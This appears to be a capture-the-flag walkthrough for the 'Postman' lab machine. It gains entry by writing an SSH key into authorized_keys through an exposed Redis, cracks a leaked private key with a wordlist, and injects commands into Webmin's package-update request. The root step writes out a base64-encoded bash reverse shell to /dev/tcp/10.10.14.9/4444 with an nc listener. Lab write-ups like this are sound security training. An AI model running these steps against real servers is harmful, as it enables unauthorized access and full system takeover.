root@blog:~#

View on GitHub

postman

RECON

Unfinished Website recon

Nmap Scan

nmap –p- -A -T4 10.10.10.160

-allports -version -Aggressive

Port 6379 Redis and Port 1000 Webpage nmap

Webpage check

Wepbpage shows an error, and the link does not work 10000

Navigating to the proper page reveals Webmin login webmin

Redis

 sudo apt-get install redis-tools

redis install

Redis Host

redis-cli -h 10.10.10.160

redis-h

Directory Check

CONFIG GET dir

 CONFIG SET dir /var/lib/redis/.ssh

redis-h

ENUMERATION

SSH Key

ssh-keygen

sshgen

Copy key to .txt file

 (echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > key.txt

keytxt

Send key to host

cat key.txt | redis-cli -h 10.10.10.160 -x set ssh_key

rkey

Check key

get ssh_key

check key

Set database

CONFIG SET dir /var/lib/redis/.ssh

CONFIG set dbfilename authorized_keys

save

exit

set db

SSH into the host

 ssh - id_rsa redis@10.10.10.160

Checking Directorys

authorized_keys directory is here

directory

Home directory

ls -l

cd Matt

ls -l

User Matt has read permison for user flag

matt

Opt Directory

 cat id_rsa.bak

Reveals Private RSA KEY

PRIVILEGE ESCALATION

John the Ripper

Copy paste the key and transfer it to .john

 /usr/share/john/ssh2john.py postman_id_rsa_enc > postman_id_rsa.john

sshtojohn

Cracked Password

 john postman_id_rsa.johm --wordlist=/usr/share/wordlists/rockyou.txt

Jonhn and rockyou.txt reveals password to be computer2008

cracked

SSH Matt

ssh Matt@10.10.10.160

Matt is denied permission

fail matt

Checking SSH

cd /etc/ssh/

ls

sshconfig

reading sshd_config shows Matt is a denied login

denny

Postmatt

 su Matt

 Password: computer2008

postmatt

Flag is now accessible

user flag

Webin is also accessible via same password

mattlogin

Checking Version shows webin 1.910

version

Root shell

Vulnearbilty

CVE 2019-12850 is a severe vulnerability

vuln

Maneuver to Package Updates and turn on Burpsuite interceptor

burpon

Send package-updates request to the repeater. Clear out some of the extra HTTP and add u=acl%2Fapt&u=$ to execute commands.

check

Payload

Base64

echo -n 'bash -c "bash -i >& /dev/tcp/10.10.14.9/4444 0>&1"'| base64

-newline -command_string -interactive_shell standard output TCP connection HOST/LISTENING PORT standard input

base64

Netcat

 nc -lvp 4444

-listen -verbose -port

netcat

URL Encode

$(echo${IFS}TCPSTRING|base64${IFS}-d|bash)

{IFS} prevent command from splitting -decode

url

Put payload in the repeater

payload

Shell

Root Connection on listner

shell

Flag in home directory

rootflag